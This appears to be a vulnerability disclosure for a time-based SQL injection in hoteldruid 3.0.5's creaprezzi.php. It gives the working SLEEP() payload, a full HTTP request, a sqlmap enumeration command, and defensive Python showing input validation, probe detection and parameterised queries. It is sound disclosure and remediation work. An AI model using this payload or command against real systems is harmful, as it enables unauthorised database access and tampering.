Affected Version: hoteldruid version 3.0.5
Security Issue:
SQL injection via POST parameter numcaselle
URL: <http://localhost/hoteldruid/creaprezzi.php>
Method: POST
Vulnerable Parameter: numcaselle
Payload: 1' AND (SELECT 7151 FROM (SELECT(SLEEP(5)))EAXh) AND 'aBsm'='aBsm
Vulnerability Description:
SQL injection (SQLi) is an injection attack in which attacker-supplied input is interpreted as part of a SQL statement, letting the attacker run statements of their choosing against the web application's database server.
Process to reproduce:
1. Copy the HTTP Request below
2. Save the file as sqli.txt
3. Run the sqlmap command below to see the extracted data from the database
HTTP Request:
POST /hoteldruid/creaprezzi.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
Referer: <http://localhost/hoteldruid/>
Content-Length: 5575
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="anno"
2023
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id_sessione"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="numcaselle"
1' AND (SELECT 7151 FROM (SELECT(SLEEP(5)))EAXh) AND 'aBsm'='aBsm
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="tipotariffa"
tariffa1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo1"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo1"
2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo1"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo1p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo2"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo2"
2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo2"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo2p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo3"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo3"
2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo3"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo3p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo4"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo4"
2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo4"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo4p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo5"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo5"
2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo5"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo5p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo6"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo6"
2023-01-24
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo6"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo6p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo7"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo7"
2023-01-24
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo7"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo7p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo8"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo8"
2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo8"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo8p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo9"
2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo9"
2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo9"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo9p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo10"
2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo10"
2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo10"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo10p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo11"
2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo11"
2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo11"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo11p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo12"
2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo12"
2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo12"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo12p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo13"
2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo13"
2023-01-23
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo13"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo13p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo14"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo14"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo14"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo14p"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="modifica"
1
------------YWJkMTQzNDcw--
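To make the request above concrete from the defender's side, here is an added Python example (not code from this report or from hoteldruid) that parses a multipart/form-data body like the one above, pulls out each field, and applies the two checks a handler for this endpoint would want: strict integer validation for fields that are only ever numeric, and a simple indicator for time-based probes when triaging logged requests. The body is a constructed, abbreviated copy of the request (same boundary, only a few of the fields); the set of integer-only fields is an assumption based on the parameter names.

```python
import re

# Same boundary as the Content-Type header in the report above.
BOUNDARY = "----------YWJkMTQzNDcw"
PAYLOAD = "1' AND (SELECT 7151 FROM (SELECT(SLEEP(5)))EAXh) AND 'aBsm'='aBsm"


def _part(name, value):
    """One multipart part: '--' + boundary, a header line, blank line, value."""
    return (f"--{BOUNDARY}\r\n"
            f'Content-Disposition: form-data; name="{name}"\r\n'
            f"\r\n{value}\r\n")


# Constructed, abbreviated copy of the report's request body (CRLF line ends).
SAMPLE_BODY = "".join([
    _part("anno", "2023"),
    _part("id_sessione", ""),
    _part("numcaselle", PAYLOAD),
    _part("tipotariffa", "tariffa1"),
    _part("inizioperiodo1", "2023-01-01"),
    _part("modifica", "1"),
]) + f"--{BOUNDARY}--\r\n"


def parse_multipart(body, boundary):
    """Return {field_name: value} for a multipart/form-data body.

    Splits on the delimiter ('--' + boundary), separates each part's headers
    from its value at the first blank line, and stops at the closing
    delimiter ('--' + boundary + '--').
    """
    fields = {}
    for part in body.split("--" + boundary)[1:]:
        if part.startswith("--"):          # closing delimiter reached
            break
        head, _, value = part.partition("\r\n\r\n")
        m = re.search(r'name="([^"]*)"', head)
        if m:
            fields[m.group(1)] = value.rstrip("\r\n")
    return fields


# Assumption for this example: these fields are counts/years/flags and must
# only ever arrive as plain non-negative integers.
INTEGER_FIELDS = {"anno", "numcaselle", "modifica"}


def validate_integer_fields(fields, names=INTEGER_FIELDS):
    """Return {name: value} for integer-only fields whose value is not a
    plain non-negative integer. A non-empty result means the request must
    be rejected before any SQL is built from it."""
    return {n: fields[n] for n in names
            if n in fields and not re.fullmatch(r"[0-9]{1,9}", fields[n])}


# Markers of time-based probes (MySQL SLEEP/BENCHMARK, PostgreSQL PG_SLEEP).
# Useful for triaging logged request bodies, not as the primary defence.
TIME_BASED_MARKERS = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(", re.I)


def time_based_indicators(fields):
    """Return the sorted names of fields whose value carries a time-based marker."""
    return sorted(n for n, v in fields.items() if TIME_BASED_MARKERS.search(v))


if __name__ == "__main__":
    parsed = parse_multipart(SAMPLE_BODY, BOUNDARY)
    print("rejected fields:", validate_integer_fields(parsed))
    print("time-based indicators in:", time_based_indicators(parsed))
```

Run stand-alone, the script rejects the request because numcaselle is not an integer and flags that same field as carrying a SLEEP() call. The validation step is the one that matters for the fix: the marker scan only helps with triage of traffic that already reached the server.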
HTTP Response:
Proof of Exploit:
SQL query - SELECT database()
hoteldruid
Screenshot:
Command used: sqlmap -r sqli.txt -p numcaselle --risk 3 --level 5 --dbs --current-user --current-db
The impact of this vulnerability:
An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.
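The impact described above comes from a single pattern: the value of numcaselle ends up inside the SQL text. The following added Python example (not hoteldruid's code; the table layout is constructed, and an in-memory SQLite database stands in for MySQL, with a stub SLEEP() registered that records each call instead of sleeping) shows the vulnerable concatenation beside a bound query, and beside a bound query with integer validation, all fed the exact payload from the report. The recorded SLEEP() calls are the signal a time-based probe depends on; with bound parameters that signal never appears.

```python
import re
import sqlite3

PAYLOAD = "1' AND (SELECT 7151 FROM (SELECT(SLEEP(5)))EAXh) AND 'aBsm'='aBsm"


def make_db():
    """Constructed stand-in for the price table the endpoint writes to.

    SQLite has no SLEEP(); a stub is registered that appends to `calls`
    and returns 0, so the example can observe whether the payload's
    SLEEP(5) was evaluated without actually sleeping."""
    calls = []
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, lambda secs: calls.append(secs) or 0)
    conn.execute("CREATE TABLE tariffe (id INTEGER PRIMARY KEY, "
                 "numcaselle INTEGER, prezzo INTEGER)")
    conn.executemany("INSERT INTO tariffe (numcaselle, prezzo) VALUES (?, ?)",
                     [(1, 50), (2, 70)])
    return conn, calls


def lookup_unsafe(conn, numcaselle):
    """The bug class in the report: untrusted input spliced into the SQL text."""
    sql = "SELECT id FROM tariffe WHERE numcaselle = '" + numcaselle + "'"
    return conn.execute(sql).fetchall()


def lookup_bound(conn, numcaselle):
    """Bound parameter only: the driver passes the value as data, so quotes
    and SQL keywords inside it are never parsed as syntax."""
    return conn.execute("SELECT id FROM tariffe WHERE numcaselle = ?",
                        (numcaselle,)).fetchall()


def lookup_safe(conn, numcaselle):
    """Bound parameter plus type validation: a count of boxes is an integer,
    so anything else is rejected before the database is involved."""
    if not isinstance(numcaselle, str) or not re.fullmatch(r"[0-9]{1,9}", numcaselle):
        raise ValueError("numcaselle must be a non-negative integer")
    return conn.execute("SELECT id FROM tariffe WHERE numcaselle = ?",
                        (int(numcaselle),)).fetchall()


def demo():
    """Run the three variants against the report's payload and a legitimate value."""
    conn, calls = make_db()
    result = {}

    result["unsafe_rows"] = lookup_unsafe(conn, PAYLOAD)   # payload parsed as SQL
    result["unsafe_sleep_calls"] = len(calls)              # SLEEP(5) was evaluated
    calls.clear()

    result["bound_rows"] = lookup_bound(conn, PAYLOAD)     # payload is just a string
    result["bound_sleep_calls"] = len(calls)               # never reaches SLEEP()
    calls.clear()

    try:
        lookup_safe(conn, PAYLOAD)
        result["safe_rejected"] = False
    except ValueError:
        result["safe_rejected"] = True
    result["safe_sleep_calls"] = len(calls)

    result["legit"] = lookup_safe(conn, "1")               # normal use still works
    return result


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The unsafe variant returns the row for numcaselle 1 and records a SLEEP() call, which is exactly the timing oracle the report's payload tests for; the bound variant returns nothing and never evaluates SLEEP(); the validated variant refuses the value outright while still serving a legitimate "1".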